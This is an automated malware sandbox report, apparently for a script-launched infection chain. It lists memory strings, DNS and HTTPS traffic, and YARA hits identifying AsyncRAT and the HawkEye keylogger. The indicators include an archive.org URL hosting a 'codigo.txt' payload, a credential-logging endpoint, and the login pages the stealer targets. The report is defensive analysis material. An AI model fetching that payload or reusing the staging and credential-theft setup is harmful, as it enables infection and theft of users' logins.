Source: vbc.exe, 0000000F.00000003.518065717.000000000094E000.00000004.00000001.sdmp	String found in binary or memory: dataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: tmpFB21.tmp.exe	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmp	String found in binary or memory: s://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlabout:blankhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://go.microsoft.com/fwlink/?LinkId=517287https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=7&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=199&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=348&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=2&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2
Source: vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmp	String found in binary or memory: s://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlabout:blankhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://go.microsoft.com/fwlink/?LinkId=517287https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=7&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=199&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=348&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=2&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2

Source: unknown

DNS traffic detected: queries for: ia601504.us.archive.org

Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp	String found in binary or memory: http://certificates.godaddy.com/repository/0
Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp	String found in binary or memory: http://certificates.godaddy.com/repository/gdig2.crt0
Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp	String found in binary or memory: http://certs.godaddy.com/repository/1301
Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, tmpFB21.tmp.exe.2.dr	String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: wscript.exe, 00000000.00000003.340516433.000001B8665AF000.00000004.00000001.sdmp	String found in binary or memory: http://crl.g
Source: tmp87E4.tmp.exe, 0000000C.00000002.610844081.000000000506F000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp	String found in binary or memory: http://crl.godaddy.com/gdig2s1-1597.crl0
Source: wscript.exe, 00000000.00000003.339839120.000001B8665BF000.00000004.00000001.sdmp	String found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0=w
Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp	String found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0F
Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp	String found in binary or memory: http://crl.godaddy.com/gdroot.crl0F
Source: tmp87E4.tmp.exe, 0000000C.00000002.610746899.0000000005046000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: 77EC63BDA74BD0D0E0426DC8F8008506.12.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: tmpFB21.tmp.exe, 0000000D.00000003.493276632.0000000005AA3000.00000004.00000001.sdmp	String found in binary or memory: http://fontfabrik.com;
Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, tmpFB21.tmp.exe.2.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.godaddy.com/0
Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.godaddy.com/02
Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.godaddy.com/05
Source: tmp87E4.tmp.exe, 0000000C.00000002.601243946.0000000002AF1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: tmpFB21.tmp.exe	String found in binary or memory: http://whatismyipaddress.com/
Source: pgr.exe, 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, tmpFB21.tmp.exe.2.dr	String found in binary or memory: http://whatismyipaddress.com/-
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: tmpFB21.tmp.exe, 0000000D.00000003.495103820.0000000005AA3000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.com
Source: tmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.com-E
Source: tmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.com;
Source: tmpFB21.tmp.exe, 0000000D.00000003.495103820.0000000005AA3000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comMP_
Source: tmpFB21.tmp.exe, 0000000D.00000003.495103820.0000000005AA3000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comafet6
Source: tmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comal
Source: tmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comfacb
Source: tmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comhly#
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: tmpFB21.tmp.exe, 0000000D.00000003.496944356.0000000005AB3000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comF
Source: tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comTTFd
Source: tmpFB21.tmp.exe, 0000000D.00000003.501081618.0000000005AA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.coma
Source: tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comalic
Source: tmpFB21.tmp.exe, 0000000D.00000003.501081618.0000000005AA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comcomF
Source: tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comd
Source: tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comdG
Source: tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comdi
Source: tmpFB21.tmp.exe, 0000000D.00000003.496944356.0000000005AB3000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comdita
Source: tmpFB21.tmp.exe, 0000000D.00000003.497421413.0000000005AB4000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comessed8
Source: tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comitu
Source: tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comsief
Source: tmpFB21.tmp.exe, 0000000D.00000003.497421413.0000000005AB4000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comtua
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: tmpFB21.tmp.exe, 0000000D.00000003.494270722.0000000005AA3000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn)
Source: tmpFB21.tmp.exe, 0000000D.00000003.494591560.0000000005AA2000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/S
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: tmpFB21.tmp.exe, 0000000D.00000003.494270722.0000000005AA3000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnlw
Source: tmpFB21.tmp.exe, 0000000D.00000003.494270722.0000000005AA3000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnm
Source: tmpFB21.tmp.exe, 0000000D.00000003.494270722.0000000005AA3000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnu
Source: tmpFB21.tmp.exe, 0000000D.00000003.498837679.0000000005AB6000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: tmpFB21.tmp.exe, 0000000D.00000003.498837679.0000000005AB6000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmQK
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: tmpFB21.tmp.exe, 0000000D.00000003.495838585.0000000005AAB000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: tmpFB21.tmp.exe, 0000000D.00000003.495725552.0000000005AA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/3
Source: tmpFB21.tmp.exe, 0000000D.00000003.496375592.0000000005AAC000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/8
Source: tmpFB21.tmp.exe, 0000000D.00000003.496076219.0000000005AAC000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/96
Source: tmpFB21.tmp.exe, 0000000D.00000003.495725552.0000000005AA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/G
Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/L
Source: tmpFB21.tmp.exe, 0000000D.00000003.496375592.0000000005AAC000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0et
Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/arge
Source: tmpFB21.tmp.exe, 0000000D.00000003.495725552.0000000005AA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/het
Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/i
Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000003.496375592.0000000005AAC000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/3
Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/G
Source: tmpFB21.tmp.exe, 0000000D.00000003.496375592.0000000005AAC000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/i
Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/r
Source: tmpFB21.tmp.exe, 0000000D.00000003.495838585.0000000005AAB000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/r
Source: tmpFB21.tmp.exe, 0000000D.00000003.495725552.0000000005AA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/udi
Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/uild
Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/vno8
Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/wab
Source: tmpFB21.tmp.exe, 0000000D.00000003.500377718.0000000005ADD000.00000004.00000001.sdmp	String found in binary or memory: http://www.monotype.
Source: vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.co
Source: tmpFB21.tmp.exe.2.dr	String found in binary or memory: http://www.nirsoft.net/
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: tmpFB21.tmp.exe, 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmp	String found in binary or memory: http://www.site.com/logs.php
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp	String found in binary or memory: http://www.urwpp.de
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: vbc.exe, 0000000F.00000003.517667198.000000000210C000.00000004.00000001.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activi
Source: vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629
Source: vbc.exe, 0000000F.00000003.518065717.000000000094E000.00000004.00000001.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736
Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp	String found in binary or memory: https://certs.godaddy.com/repository/0
Source: vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&
Source: vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://c
Source: wscript.exe, 00000000.00000003.339775838.000001B866587000.00000004.00000001.sdmp	String found in binary or memory: https://ia601504.us.archive.org/
Source: wscript.exe, 00000000.00000003.340835595.000001B863D52000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.369127141.000001B865B94000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.361151297.000001B863DE7000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.373459438.000001B865C70000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.339839120.000001B8665BF000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.368780987.000001B865B73000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.373627611.000001B865F9B000.00000004.00000001.sdmp	String found in binary or memory: https://ia601504.us.archive.org/25/items/codigo_202104/codigo.txt
Source: wscript.exe, 00000000.00000003.339839120.000001B8665BF000.00000004.00000001.sdmp	String found in binary or memory: https://ia601504.us.archive.org/25/items/codigo_202104/codigo.txt3u
Source: wscript.exe, 00000000.00000003.339656954.000001B863D52000.00000004.00000001.sdmp	String found in binary or memory: https://ia601504.us.archive.org/25/iter
Source: wscript.exe, 00000000.00000003.339775838.000001B866587000.00000004.00000001.sdmp	String found in binary or memory: https://ia601504.us.archive.org/3
Source: wscript.exe, 00000000.00000003.339775838.000001B866587000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com
Source: tmpFB21.tmp.exe	String found in binary or memory: https://login.yahoo.com/config/login
Source: tmpFB21.tmp.exe	String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https:/

Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699

Source: unknown

HTTPS traffic detected: 207.241.227.114:443 -> 192.168.2.6:49699 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected AsyncRAT

Show sources

Source: Yara match	File source: 0000000C.00000000.429733559.00000000006E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.599252774.00000000006E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.601243946.0000000002AF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tmp87E4.tmp.exe PID: 5036, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe, type: DROPPED
Source: Yara match	File source: 12.0.tmp87E4.tmp.exe.6e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.tmp87E4.tmp.exe.6e0000.0.unpack, type: UNPACKEDPE

Yara detected HawkEye Keylogger

Show sources

Source: Yara match	File source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tmpFB21.tmp.exe PID: 4928, type: MEMORY
Source: Yara match	File source: Process Memory Space: pgr.exe PID: 1068, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPED
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.8ffa72.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack, type: UNPACKEDPE
